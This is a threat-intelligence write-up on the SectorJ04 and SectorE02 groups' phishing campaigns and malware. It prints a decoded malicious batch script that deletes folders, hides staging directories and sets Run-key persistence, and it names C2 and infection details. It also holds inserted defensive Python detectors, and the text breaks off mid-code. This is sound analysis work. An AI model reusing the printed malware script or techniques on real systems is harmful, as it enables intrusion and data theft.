SectorJ04 Group’s Increased Activity in 2019

Abstract

SectorJ04 is a Russian-based cybercrime group that began operating about five years ago and conducted hacking activities for financial profit using malware such as banking trojans and ransomware against national and industrial sectors located across Europe, North America and West Africa.

In 2019, the SectorJ04 group expanded its hacking activities to cover various industrial sectors located across Southeast Asia and East Asia, and is changing the pattern of their attacks from targeted attacks to searching for random victims. This report includes details related to the major hacking targets of the SectorJ04 group in 2019, how those targets were hacked, characteristics of their hacking activities this year and recent cases of the SectorJ04 group’s hacking.

SectorJ04 group activity range and hacking methods

The SectorJ04 group has maintained the scope of its existing hacking activities while expanding them to companies in various industrial sectors located in East Asia and Southeast Asia. There was a significant increase in their hacking activities in 2019, especially those targeting South Korea. They mainly use spam email to deliver a backdoor that executes additional commands received from the attacker’s server.

Main countries and sectors targeted

The SectorJ04 group’s preexisting targets were financial institutions located in North America and Europe, or general companies such as retail and manufacturing, but they recently expanded their areas of activity to include the medical, pharmaceutical, media, energy and manufacturing industries. They do not appear to place many restrictions on the sectors targeted. The following are the sectors and countries in which SectorJ04 group activity was found in 2019.

Figure 1 SectorJ04 group’s first half activity timeline in 2019

Targeted Countries

We saw SectorJ04 group activity in Germany, Indonesia, the United States, Taiwan, India, France, Serbia, Ecuador, Argentina, South Korea, Japan, China, Britain, South Africa, Italy, Hong Kong, Romania, Ukraine, Macedonia, Russia, Switzerland, Senegal, the Philippines, UAE, Qatar, Saudi Arabia, Pakistan, Thailand, Bahrain, Turkey, Bulgaria and Bangladesh.

Figure 2 SectorJ04 group targeted countries

Targeted Industries

  • Financial-related corporate and government departments such as banks and exchanges
  • Retail business such as shopping malls and social commerce
  • Educational institutions such as universities
  • Manufacturing companies such as manufacturers of electronic products
  • Media companies such as broadcasting and media
  • Pharmaceutical and biotechnology-related companies
  • A job-seeking company
  • Energy-related companies such as urban gas and wind power generation

Hacking Techniques

The SectorJ04 group mainly uses spear phishing emails with MS Word or Excel files attached; the document file downloads a Microsoft Installer (MSI) package from the attacker’s server and uses it to install a backdoor on the infected system. As anti-virus programs have recently begun to detect these MSI files, in some instances the macro scripts contained in the malicious documents install the backdoor directly onto the infected system without using an MSI file.

Figure 3 Schematic drawing for SectorJ04 group’s hacking method

The malicious documents used for hacking mainly carry MS Office-themed lures, and the same lure is often reused several times with only the language changed to match the victim’s.

In addition, the MSI files that deliver the backdoor mostly carried valid digital signatures, and most of the malware was signed just days before it was found.

Figure 4 Part of the malicious document execution screen that the SectorJ04 group attaches to the spear phishing email
Figure 5 Part of the digital signature found in the executable used for hacking

Digital signature information found in malware

  • VAL TRADEMARK TWO LIMITED
  • ALLO LTD
  • COME AWAY FILMS LTD
  • AWAY PARTNERS LIMITED
  • ANG APPCONN LIMITED
  • START ARCHITECTURE LTD
  • SLON LTD
  • DIGITAL DR
  • FIT AND FLEX LIMITED
  • Dream Body Limited
  • BOOK A TEACHER LTD
  • MARK A EVANS LTD
  • WAL GRAY LTD
  • MISHA LONDON LTD
  • START ARCHITECTURE LT
  • BASS AUTOMOTIVE LIMITE
  • FILESWAP GLOBAL LT
  • HAB CLUB LT
  • ET HOMES LT

Main Malware Used

The SectorJ04 group mainly used their own backdoors, ServHelper and FlawedAmmy RAT, for hacking. They also used the Remote Manipulator System (RMS) RAT, a legitimate remote management software created in Russia. Once a backdoor is installed on an infected system, they also use it to distribute email stealers, botnet malware and ransomware.

They were recently confirmed to use additional backdoors called AdroMut and FlowerPippi, which are used to install other backdoors such as FlawedAmmy RAT in place of the MSI file, or to collect system information and send it to the attacker’s server.

Malware Types Found Before 2019

ServHelper
  • Initial infection method: an MSI file downloaded by a document file attached to a spear phishing email
  • Downloaded by the MSI: Nullsoft Installer
  • Characteristic: C2 responses use a specific separator

FlawedAmmy RAT
  • Initial infection method: an MSI file downloaded by a document file attached to a spear phishing email
  • Downloaded by the MSI: encoded FlawedAmmy RAT
  • Characteristics: checks for antivirus; registers automatic execution under the name “wsus.exe”

RMS RAT
  • Initial infection method: an MSI file downloaded by a document file attached to a spear phishing email
  • Downloaded by the MSI: SFX file
  • Characteristic: uses configuration files in DAT format

Malware Types Found After 2019

AdroMut and FlowerPippi
  • Initial infection method: document files attached to spear phishing emails
  • Characteristics:
    • Internal strings are base64-decoded and then decrypted in AES-256-ECB mode
    • Infected-system information is assembled in (encrypted) JSON format
    • Loaded into “ComputerDefaults.exe” using the DLL side-loading technique
    • FlowerPippi uses a hard-coded RC4 key and has simpler functionality than AdroMut

The backdoor installed on the infected system distributes additional botnet malware, ransomware and email stealers. The email stealer collects mail protocol (SMTP, IMAP and POP3) connection settings and account information stored in the registry by the Outlook and Thunderbird mail clients and sends them to the attacker’s server in a specific format.

Figure 6 Format to send email credentials collected by email stealer
Figure 7 Some of the email stealer codes that access email account information stored in the registry
Figure 8 Some of the email stealer codes that access email account information stored in the registry 2

The email stealer may also have a file collection function that harvests email addresses recorded in the metadata of files with hard-coded extensions. In addition, the malware eventually creates and executes a batch file to delete itself, removing its execution traces from the infected PC.

Figure 9 Some of the file extensions that the email stealer collects data from

The SectorJ04 group is believed to collect the email accounts stored on infected systems for use in subsequent attacks.

Characteristics of hacking activities of SectorJ04 group in 2019

The following are the features of the first half of 2019 activities identified through the analysis of the SectorJ04 group’s hacking activities.

  • Increased hacking activities targeting East and Southeast Asia
  • Changes in spam email format and hacking methods
  • Changes in hacking targets from specific organizations and industry groups to a large number of random ones

Although the SectorJ04 group mainly targeted countries located in Europe or North America, it has recently expanded its field of activities to countries located in Southeast Asia and East Asia. In particular, the frequency of hacking attacks targeting South Korea has increased, and spam emails targeting China were found in May.

The changes could also be seen in the attachments to spam emails used by the attackers. Earlier spam emails used attachments in the form of malicious documents, but attachments with HTM and HTML extensions were also found, and the email body included links to download the malicious documents directly.

The SectorJ04 group’s initial spam emails had no body text or only short sentences, but the latest spam emails found were elaborately written and included images. A new type of backdoor called AdroMut and a new malware called FlowerPippi were also found coming from SectorJ04.

Prior to 2019, the SectorJ04 group conducted large-scale hacking activities for financial gain, using exploit kits on websites to install ransomware such as Locky and GlobeImposter, along with its banking Trojan, on its victims’ computers. Since 2019 the group has changed its strategy to attacks using spam email. In particular, a number of remote control malware families are used to harvest resources such as email accounts and system login information from the infected machine, which are then used to send more spam emails and distribute their malware.

Increased hacking activities targeting East and Southeast Asia

The hacking activities of the SectorJ04 group targeting South Korea in the first half of 2019 were discovered continuously. The emails found referred to invoices and tax accounting data, and had MS Word or Excel files with malicious macros attached. The malicious documents written in Korean use the same MS Office-themed lure as those used in hacking activities in other languages.

Figure 10 Spear phishing emails disguised as order sheets

In June 2019, continuous hacking activities targeting South Korea were found again and spam emails were written with various contents, including transaction statements, receipts and remittance cards. During that period, a number of spam emails disguised as remittance cards of the same type were found.

Figure 11 Spear phishing email disguised as a remittance card

The SectorJ04 group has carried out large-scale hacking activities targeting South Korea, while also expanding the field of attacks to Southeast Asian countries such as Taiwan and the Philippines. Spam emails and attachments written in Chinese were found in May, and the SectorJ04 group at that time targeted industrial sectors such as electronics and telecommunications, international schools and manufacturing.

Figure 12 Spear phishing emails written in Chinese
Figure 13 Malicious excel file execution screen written in Chinese

Changes in spam email format and hacking methods

In June, SectorJ04 group conducted hacking using spam emails written in various languages, including English, Arabic, Korean and Italian, and the emails were written with various contents, including remittance card, invoice and tax invoice.

Along with the existing method of using MS Word or Excel files as attachments, they used HTML files to download malicious documents as attachments, or included links to download malicious documents directly in the text.

In the past, the emails used in attacks had little or no content, but the latest ones are elaborately written and include images.

Figure 14 Spear phishing email disguised as bank statement
Figure 15 Spear phishing email disguised as a hospital certificate

Changes have also been found in the hacking method of the SectorJ04 group. In addition to their pre-existing backdoors, ServHelper and FlawedAmmy RAT, they have also been confirmed to use the backdoors called AdroMut and FlowerPippi.

AdroMut downloads the malware (ServHelper and FlawedAmmy RAT) used by the SectorJ04 group from the attacker server and simultaneously performs the functions of a backdoor.

FlowerPippi collects infected system information, such as the domain of the infected system, proxy settings, administrator rights and OS version, and performs functions such as executing received commands and downloading and executing DLL and EXE files.

Figure 16 Encoded Strings on the AdroMut Backdoor
Figure 17 Hard-coded RC4 key found in the FlowerPippi backdoor

The SectorJ04 group is believed to have developed and deployed malware that functions as a downloader, installing or downloading its other malware, to replace the MSI installation files it had used for hacking for more than six months, as the detection rate of security solutions against those MSI files increased.

Figure 18 Some of the digital certificate information identified in the corresponding hacking activity

The SectorJ04 group, which had been using the same infection pattern and the same malware for more than six months, is believed to be changing its infection methods: downloading malware directly from malicious documents without using MSI installation files, changing its spam email format and using new types of backdoor.

Changes in hacking targets from specific organizations and industries to random ones

Until 2019, the SectorJ04 group had carried out massive website-based hacking activities that mainly used ransomware and banking trojans for financial profit; since 2019 it has also been carrying out information gathering activities to secure attack resources such as email accounts and system login information from users.

This allows them to expand their range of targets of hacking activities for financial profit, and in this regard, SectorJ04 group has been found to have hacked into a company’s internal network by using a spear phishing email targeting executives and employees of certain South Korean companies around February 2019.

They eventually hacked the Active Directory (AD) server and took control of the entire corporate internal network, and then distributed the Clop ransomware from the AD server. In the same hacking activity, we also found malware for collecting email information and “AmadeyBot”, a botnet malware whose source code is available on Russian underground forums.

Figure 19 Spear phishing email used for hacking activities targeting AD servers in South Korea

They are believed to have continuously attempted to hack into companies in South Korea to distribute the Clop ransomware. In May, the attackers used spam emails disguised as being sent by the National Tax Service to install FlawedAmmy RAT on infected systems, and during that period a Clop ransomware sample was found using the same certificate as the FlawedAmmy RAT executable file.

Figure 20 Spear phishing email disguised as tax bill

The SectorJ04 group has shown a pattern of hacking activities that have changed from targeted attacks to a large-scale distribution of spam.

Major Malware Installation Types

The following describes three types of backdoor infections that are installed from malicious documents identified in the SectorJ04 group-related hacking cases that occurred during the first half of 2019.

Type 1 – Using encoded executable file

SectorJ04 group carried out intensive hacking on various industrial sectors, including South Korea’s media, manufacturing and universities, around February and March 2019. They used the spear phishing email to spread malicious Excel or malicious Word files, and downloaded the MSI files from the attacker’s server when the malicious documents were run.

The MSI file installs a downloader that fetches an encoded FlawedAmmy RAT from the attacker’s server onto the infected system, and the downloaded FlawedAmmy RAT registers itself for automatic execution under the name “wsus.exe”.

Figure 21 Backdoor installation type using an encoded executable file (Type 1)

FlawedAmmy RAT performs remote control functions in the infected system and decodes encoded executable files downloaded from the attacker server using certain hard-coded strings. It also has a function to check if a particular process is running to determine whether their malware should be executed.

Figure 22 “Ammy Admin” string found in FlawedAmmy RAT
Figure 23 Part of decode code that uses hard-coded strings

Type 2 – Using NSIS Script

SectorJ04 group conducted hacking activities targeting financial institutions located in India and Hong Kong around April 2019. Malicious documents delivered through the spear phishing email downloaded the MSI file, which forwards the NSIS Installer to the infected system. The NSIS script executes the final payload, ServHelper, in the DLL file format, using “rundll32.exe”.

Note that NSIS (Nullsoft Scriptable Install System) is a script-based installation system for Windows and is a lightweight installation system supported by Nullsoft.

Figure 24 Backdoor installation type utilizing NSIS Installer Type 2

Decompressing the NSIS installer installed by the MSI file shows that it consists of an NSIS script with an NSI extension, a ServHelper in the DLL file format, and a “ncExec.dll,” the normal DLL required to run the NSIS.

Figure 25 Uncompressed NSIS installer
Figure 26 Part of the NSIS script for running ServHelper in the DLL file format

ServHelper performs the backdoor function on the infected system and sends specific types of responses to the C2 server using delimiters such as “key”, “sysid” and “resp”. Different delimiters are sometimes found depending on the sample.

Figure 27 ServHelper Backdoor C2 Communication Code Partial

Type 3 – Using Self-Extracting File

SectorJ04 group carried out hacking activities targeting financial institutions located in Italy and other countries around May 2019. Malicious documents delivered through the spear phishing email pass MSI files to the infected system, and the MSI files download an executable self-extracting (SFX) file. When the SFX file is executed, another SFX file inside it is executed and the final payload, RMS RAT, is delivered to the infected system.

Figure 28 Backdoor installation type utilizing SFX executable files Type 3

The first SFX file downloaded by the MSI file contains four files. When the SFX file is executed, it runs a command that renames the inner SFX file (“kernel.dll”, which carries a DLL extension) to an EXE extension and decompresses it using a hard-coded password. The files that make up the SFX file vary from sample to sample.

Figure 29 The first SFX file to be downloaded from an MSI file
Figure 30 “i.cmd” for decompression of the second SFX file

The decompressed second SFX file also contains four files and, as before, runs “exit.exe”. “exit.exe” executes the same “i.cmd” as before, which registers and executes an RMS RAT under the file name “winserv.exe”. RMS RAT is a legitimate remote management software created in Russia, and the files with DAT extensions contain the configuration information needed to run it.

Figure 31 Contents of the second SFX file disguised with a DLL file extension
Figure 32 RMS RAT configuration file with a DAT extension

SectorJ04 Group Activity in South Korea

The following is about the activities of the SectorJ04 group found in South Korea in July and August 2019.

Hacking activities disguised as electronic tickets by large airlines

In late July, SectorJ04 group used FlawedAmmy RAT to carry out hacking attacks on companies and universities in sectors such as education, job openings, real estate and semiconductors in South Korea. Spam emails targeting email accounts used in the integrated mail service of public officials were also found in the hacking activity.

Figure 33 Spam email disguised as electronic tickets

They used spam emails disguised as those sent by large South Korean airlines and used ISO-format files as attachments. The group used the same body contents of the email to deliver spam emails to multiple hacking targets.

Extracting the ISO file attached to the spam email reveals an SCR file disguised with a “.pdf” extension, which is a .NET executable that downloads an MSI file. The ISO files sometimes contain LNK files instead, which, like the .NET malware, download an MSI file from a remote location.

Figure 34 A disguised SCR file identified within an ISO file
Figure 35 MSI file downloader written as .NET
Figure 36 Disguised LNK file identified within ISO file

The following valid digital signatures were found in the MSI file downloaded from the attacker server. Other digital signatures were also found issued by “HAB CLUB LT” and “LUK 4 TRANSPORT LT”.

Figure 37 Digital signature information for MSI files found in hacking activities

Finally, FlawedAmmy RAT is downloaded from the remote server, and the activity uses a Base64-encoded PowerShell script to determine whether the infected system is a PC joined to an Active Directory domain.

Figure 38 PowerShell script to determine if a PC belongs to a domain
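The domain-membership probe above is delivered as an encoded PowerShell command line, which is the detection opportunity a defender has. The following is an added example (not code from the report) that decodes -EncodedCommand arguments found in constructed process-creation log lines and flags scripts that ask whether the host is domain-joined; the log format and the encoded script are assumptions, since the report does not reproduce the actual script.

```python
import base64
import re


def encode_ps(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample process-creation log lines (not from the report). The encoded script in
# the first line is an assumed stand-in for the domain-membership check the text describes.
SAMPLE_LOGS = [
    "2019-07-30T09:12:01 host=WS01 user=alice cmdline=powershell.exe -NoP -W Hidden -EncodedCommand "
    + encode_ps("(Get-WmiObject Win32_ComputerSystem).PartOfDomain"),
    "2019-07-30T09:13:44 host=WS01 user=alice cmdline=notepad.exe report.txt",
    "2019-07-30T09:15:10 host=WS02 user=bob cmdline=powershell.exe -enc " + encode_ps("Get-Date"),
]

# -EncodedCommand and its common abbreviations (-enc, -ec, -e) followed by a base64 token.
ENC_RE = re.compile(r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]{16,})", re.I)
# Substrings that indicate the script is asking whether the host is domain-joined.
DOMAIN_HINTS = ("partofdomain", "userdnsdomain", "domainrole", "get-addomain")


def decode_encoded_command(cmdline: str):
    """Return the decoded script from an encoded PowerShell command line, or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def scan(lines):
    """Flag encoded PowerShell launches and mark those that probe AD domain membership."""
    findings = []
    for line in lines:
        if "powershell" not in line.lower():
            continue
        script = decode_encoded_command(line)
        if script is None:
            continue
        hits = [h for h in DOMAIN_HINTS if h in script.lower()]
        findings.append({"when": line[:19], "script": script,
                         "domain_check": bool(hits), "hits": hits})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOGS):
        print(finding)
```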

Hacking activity using same email content as the past

In early August, the SectorJ04 group carried out extensive hacking activities targeting the users around the world, including South Korea, India, Britain, the United States, Germany, Canada, Argentina, Bangladesh and Hong Kong.

Their activities were particularly heavy in healthcare-related areas such as healthcare, pharmaceuticals, biotechnology and healthcare-wage management, as well as energy-related companies such as gas and wind power. Also, they continued their attacks on preexisting hacking target areas such as manufacturing, distribution and retail.

Spam emails with body text written in French and English were found, and an MS Word file named with random numbers was used as the attachment. All emails found in this hacking activity had the same body text.

Figure 39 Spear phishing emails written in French and English

Spam emails in Korean were also identified in this hacking activity, reusing the email body text used in June. The attached file is an MS Word file titled “스캔_(random number).doc”.

Figure 40 Spear phishing email targeted to South Korea using the same text used in the past

The MS Word file used as an attachment is disguised as an order confirmation or a goods receipt. Running the macro in the document launches a DLL-format downloader using “rundll32.exe”. The downloader downloads FlawedAmmy RAT from the attacker’s server and runs it under the name “rundl32.exe”.

Figure 41 Malicious document execution screen disguised as order confirmation
Figure 42 Malicious document execution screen for Korea language users disguised as a receipt of goods
Figure 43 Part of the macro script included in the malicious document

The FlawedAmmy RAT found in this hacking activity had the existing “Ammyy Admin” string modified to “Popss Admin” and created a mutex named “KLGjigjuw4j892358u432i5”. In addition, the compile path “c:\\123\\123\\clear\\ammyygeneric\\target\\TrFmFileSys.h” was found inside the file.

Figure 44 Change hard-coded string information in FlawedAmmy RAT
Figure 45 Mutex generation code using hard-coded string information

In addition to the above mentioned changes in the FlawedAmmy RAT found in the most recent hacking activity, other changes such as changes in their string decoding were identified.

Conclusion

The SectorJ04 group’s range of targets increased sharply in 2019, and they appear to be striving to carry out elaborate attacks while at the same time targeting indiscriminately. They are one of the most active cybercrime groups of 2019; they frequently modify and tweak their hacking methods and perform hacking activities periodically.

The SectorJ04 group’s hacking activities are expected to continue to increase, and the ThreatRecon team will continue to monitor the attack activity against the group.

Indicators of Compromise

IoCs of the SectorJ04 group included in the report can be found here.

More information about the SectorJ04 group is available to customers of ThreatRecon Intelligence Service (RA.global@nshc.net).

MITRE ATT&CK Techniques

The following is a list of MITRE ATT&CK Techniques we have observed based on our analysis of these malware.

Initial Access

Spearphishing Attachment
Spearphishing Link
Trusted Relationship

Execution

Command-Line Interface
Execution through API
Execution through Module Load
Exploitation for Client Execution
PowerShell
Rundll32
Scheduled Task
Scripting
Service Execution
User Execution
Windows Management Instrumentation

Persistence

Account Manipulation
New Service
Registry Run Keys / Startup Folder
Scheduled Task
Startup items
System Firmware
Windows Management Instrumentation Event Subscription

Privilege Escalation

Bypass User Account Control
New Service
Scheduled Task
Startup items

Defense Evasion

Bypass User Account Control
Code Signing
Disabling Security Tools
DLL Side-Loading
Exploitation for Defense Evasion
Hidden Window
Modify Registry
Obfuscated Files or Information
Rundll32
Scripting
Software Packing
Virtualization/Sandbox Evasion

Credential Access

Account Manipulation
Input Capture
Input Prompt

Discovery

Account Discovery
File and Directory Discovery
Network Service Scanning
Network Share Discovery
Permission Groups Discovery
Process Discovery
Query Registry
Remote System Discovery
Security Software Discovery
System Information Discovery
System Network Configuration Discovery
System Network Connections Discovery
System Owner/User Discovery
System Service Discovery
Virtualization/Sandbox Evasion

Lateral Movement

Remote Desktop Protocol
Remote Services

Collection

Automated Collection
Data from Local System
Email Collection
Input Capture

Command and Control

Commonly Used Port
Custom Command and Control Protocol
Custom Cryptographic Protocol
Data Encoding
Remote Access Tools
Standard Application Layer Protocol
Standard Cryptographic Protocol

Exfiltration

Automated Exfiltration
Data Compressed
Exfiltration Over Alternative Protocol
Exfiltration Over Command and Control Channel

Impact

Data Encrypted for Impact

References

KRCERT – Analysis of Attacks on AD Server (2019.04.17)
https://www.krcert.or.kr/data/reportView.do?bulletin_writing_sequence=35006

SectorE02 Updates YTY Framework in New Targeted Campaign Against Pakistan Government

Overview

From March to July this year, the ThreatRecon team noticed a spear phishing campaign by the SectorE02 group against the Government of Pakistan and organizations there related to defense and intelligence. The spear phishing emails carry Excel XLS files that ask the victim to enable macros, which then execute the downloader. Malicious document lures they have employed recently include a document purporting to be a registration form for the Pakistan Air Force.

Security advisory by the Pakistan government regarding targeted attacks

SectorE02 is a threat actor that has targeted countries in South Asia, especially Pakistan, since at least 2012. Their arsenal includes a modular framework researchers have dubbed the “YTY Framework”, which has Windows and mobile versions. This framework allows the SectorE02 group to constantly modify and even remake individual plugins, and to pick and choose which plugins, if any, are sent to each victim. The modularity also helps the group keep antivirus detections low, because each module only does something simple and will not even work without certain previously dropped files. In this post, we describe their lure document, first-stage downloader, file plugin, screenshot plugin, keylogger plugin and exfiltration uploader plugin.

Excel Spear Phishing

The Excel files they used had names such as Credit_Score.xls, Advance_Salary.xls, CSD_Schemes_2019.xls and Agrani_Bank.xls. In some instances, the file masqueraded as an Excel calculator from the National Bank of Pakistan.

Lure document 1

In later stages of the campaign, however, the group appeared to switch to using a MsgBox to show an error saying “This file is corrupted”.

Lure document 2

Behind the scenes, the Excel macro retrieves encoded data stored inside the document itself; the encoding is a simple decimal encoding, one byte per number, with a comma (or an exclamation mark) as the separator. The same encoding is used for the dropped executable, although more often an entire zip archive containing two files, a batch script and an executable, is encoded, then unzipped and executed.

All four files shown here are illustrative copies of the original “.txt”, “.pdf” and “.inp” files, which are actually executable binaries
Example Encoded Batch File in XLS Doc using Comma Separator

The dropped batch scripts follow the same basic format: creating folders with the hidden, system, and archive attributes, dropping the batch and executable files there, and setting persistence through either scheduled tasks or the autorun registry key. A text file containing the %COMPUTERNAME% variable and random digits will also be saved as “win.txt”, and this file is required for the executable downloader.

A dump showing the scheduled task created by the batch script

The batch file that is dropped is used for three main purposes: 1) to set up the first folder, which is used to store the text file containing the computer name, 2) to set up what we call the “common exfiltration folder” which each individual plugin uses for different purposes, and 3) to set up persistence via scheduled task or registry run keys.

Example Decoded Batch File in XLS Doc
/echo off
rd /s /q %USERPROFILE%\Printers\Neighbourhood\Spools
rd /s /q %USERPROFILE%\Print\Network\Server
rd /s /q %USERPROFILE%\DriveData\Files
rd /s /q %USERPROFILE%\DriveData\Wins
md %USERPROFILE%\Printers\Neighbourhood\Spools
md %USERPROFILE%\DriveData\Files
md %USERPROFILE%\DriveData\Wins
md %USERPROFILE%\Print\Network\Server
attrib +a +h +s "%USERPROFILE%\DriveData"
attrib +a +h +s "%USERPROFILE%\Printers"
attrib +a +h +s "%USERPROFILE%\Print"
SET /A %COMPUTERNAME%
SET /A RAND=%RANDOM% 10000 + 1
echo %COMPUTERNAME%-%RAND% >> %USERPROFILE%\DriveData\Files\win.txt
echo %COMPUTERNAME%-%RAND% >> %USERPROFILE%\DriveData\Wins\win.txt
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Files /f
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Wins /f
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v BigSyn /f
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Dataupdate /f
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Files /t REG_SZ /d %USERPROFILE%\DriveData\Wins\juchek.exe
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Wins /t REG_SZ /d %USERPROFILE%\DriveData\Files\svchots.exe
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v BigSyn /t REG_SZ /d %USERPROFILE%\DriveData\Files\lssms.exe
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v BigUpdate /t REG_SZ /d %USERPROFILE%\DriveData\Files\lssmp.exe
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Dataupdate /t REG_SZ /d %USERPROFILE%\DriveData\Files\kylgr.exe
move %userprofile%\AppData\juchek.ttp %userprofile%\DriveData\Wins
ren %userprofile%\DriveData\Wins\juchek.ttp juchek.exe
del %0
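As an added example that is not part of the original report, the following Python check looks for the host artifacts this batch script leaves behind: the five Run-key value names, the DriveData/Print staging directories, and the win.txt beacon identifier. It assumes the registry values and directory listing were collected separately (for instance with winreg and os.path on the host) and are passed in as plain data; the snapshot below is constructed.

```python
import re

# Registry key and value names written by the dropped batch script.
RUN_KEY = r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
RUN_VALUE_NAMES = {"Files", "Wins", "BigSyn", "BigUpdate", "Dataupdate"}

# Staging directories the script creates (their parents get attrib +a +h +s).
STAGING_DIRS = (
    r"%USERPROFILE%\DriveData\Files",
    r"%USERPROFILE%\DriveData\Wins",
    r"%USERPROFILE%\Printers\Neighbourhood\Spools",
    r"%USERPROFILE%\Print\Network\Server",
)
WIN_TXT = r"%USERPROFILE%\DriveData\Files\win.txt"

# win.txt holds "<COMPUTERNAME>-<random>"; the downloader refuses to run without it.
WIN_TXT_RE = re.compile(r"^(?P<host>[A-Za-z0-9-]+)-(?P<rand>\d{1,5})$")


def expand(path, userprofile):
    """Expand the %USERPROFILE% placeholder the batch script relies on."""
    return path.replace("%USERPROFILE%", userprofile)


def check_host(run_values, existing_paths, userprofile, win_txt_content=None):
    """Return a list of finding strings for one host snapshot.

    run_values      : {value_name: data} read from the HKCU Run key
    existing_paths  : iterable of directory/file paths present on disk
    win_txt_content : contents of win.txt if the file exists, else None
    """
    findings = []
    present = {p.lower() for p in existing_paths}

    # 1) Run-key values with the script's names that point into DriveData.
    for name, data in run_values.items():
        if name in RUN_VALUE_NAMES and "\\drivedata\\" in data.lower():
            findings.append(f"run-key persistence: {RUN_KEY}\\{name} = {data}")

    # 2) The staging directories themselves (hidden+system on a live host).
    for d in STAGING_DIRS:
        full = expand(d, userprofile)
        if full.lower() in present:
            findings.append(f"staging directory present: {full}")

    # 3) The beacon identifier file the downloader and uploader depend on.
    if win_txt_content is not None:
        m = WIN_TXT_RE.match(win_txt_content.strip())
        if m:
            findings.append(
                f"beacon id file {expand(WIN_TXT, userprofile)}: "
                f"host={m['host']} rand={m['rand']}"
            )
    return findings


# Constructed snapshot resembling an infected host (not real data).
SAMPLE_USERPROFILE = r"C:\Users\victim"
SAMPLE_RUN_VALUES = {
    "OneDrive": r"C:\Users\victim\AppData\Local\Microsoft\OneDrive\OneDrive.exe",
    "Files": r"C:\Users\victim\DriveData\Wins\juchek.exe",
    "Wins": r"C:\Users\victim\DriveData\Files\svchots.exe",
}
SAMPLE_PATHS = {
    r"C:\Users\victim\DriveData\Files",
    r"C:\Users\victim\DriveData\Wins",
    r"C:\Users\victim\Print\Network\Server",
    r"C:\Users\victim\Documents",
}
SAMPLE_WIN_TXT = "DESKTOP-7F3A2B-4821\r\n"

if __name__ == "__main__":
    for finding in check_host(SAMPLE_RUN_VALUES, SAMPLE_PATHS,
                              SAMPLE_USERPROFILE, SAMPLE_WIN_TXT):
        print(finding)
```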

Downloader (b874a158f019dc082a0069eb3f7e169fbec2b4f05b123eed62d81776a7ddb384)

Looking at the latest downloader executable, which masquerades its filename as an InPage word document (bgfRdstr54sf.inp), it starts off by using CreateEventA as a mutex with the value “ab567” and only runs if the file %USERPROFILE%\DriveData\Files\win.txt exists. It polls the C2 server roughly every 100 seconds. It uses the fixed user agent string “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0” and performs an HTTPS GET against servicejobs[.]life/orderme/<computername>-<random>.

This is a change from their previous URL structure, “/orderme”, which contained the file(s) to be downloaded, and the per-victim path allows them to cherry-pick their victims – unless the SectorE02 operator specifically places the next-stage malware in the server directory for a particular victim, that victim will only ever be infected with the downloader.

The downloader accepts three commands from the server, selected by the Content-Type header of the response: “Content-Type: application”, “Content-Type: cmdline”, or “Content-Type: batcmd”. These are used for saving files to disk or executing files/commands on the system, and this is how the next-stage downloader or plugins are executed on the victim system.

Screenshot Plugin (f10f41bd38832596d4c449f81b9eb4129361aa4e4ebd4a8e8d2d8bf388934ca5)

This executable plugin takes a screenshot every two minutes using the Windows API to draw the raw screen bitmap to the common exfiltration folder, %USERPROFILE%\Print\Network\Server\. It then converts this raw bitmap to a JPG in a new file and deletes the raw bitmap file.

Code in the screenshot plugin creating the raw bitmap

The screenshot files are named in the format of “tm_hour-tm_min-tm_sec-tm_year-tm_mday-tm_mon” [1].

Screenshot JPGs created by the screenshot plugin

Like some of the other YTY components, the obfuscated strings can be deobfuscated by applying the base64 and string-reversal steps repeatedly (three times in this case).

The strings can be deobfuscated by running both the base64 and reverse algorithm three times
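An added helper, not from the report or the YTY code, that undoes the layered base64-plus-reversal obfuscation described above. The report does not state which of the two operations comes first within a layer, so the helper tries both orders; the sample string it decodes is constructed here with the inverse transform.

```python
import base64
import binascii
import string

PRINTABLE = set(string.printable)


def _decode_layer(data: bytes, reverse_first: bool) -> bytes:
    """Remove one layer: base64-decode then reverse, or reverse then base64-decode."""
    if reverse_first:
        return base64.b64decode(data[::-1], validate=True)
    return base64.b64decode(data, validate=True)[::-1]


def deobfuscate(blob: str, rounds: int = 3, reverse_first: bool = False) -> str:
    """Strip `rounds` layers of base64 + reversal from an obfuscated string."""
    data = blob.encode("ascii")
    for _ in range(rounds):
        data = _decode_layer(data, reverse_first)
    return data.decode("ascii")


def deobfuscate_auto(blob: str, rounds: int = 3):
    """Try both layer orders; return (plaintext, order) for the first one that
    decodes cleanly to printable text, or (None, None) if neither does."""
    for reverse_first in (False, True):
        try:
            text = deobfuscate(blob, rounds, reverse_first)
        except (binascii.Error, UnicodeDecodeError):
            continue  # invalid base64 alphabet/padding or non-ASCII output
        if text and set(text) <= PRINTABLE:
            return text, ("reverse-then-b64decode" if reverse_first
                          else "b64decode-then-reverse")
    return None, None


def obfuscate(plain: str, rounds: int = 3, reverse_first: bool = False) -> str:
    """Inverse of deobfuscate(); used only to build the constructed sample."""
    data = plain.encode("ascii")
    for _ in range(rounds):
        # Each layer applies the inverse of _decode_layer in the opposite order.
        data = (base64.b64encode(data)[::-1] if reverse_first
                else base64.b64encode(data[::-1]))
    return data.decode("ascii")


# Constructed sample: a path string from the report, wrapped in three layers.
SAMPLE_PLAINTEXT = r"%USERPROFILE%\Print\Network\Server"
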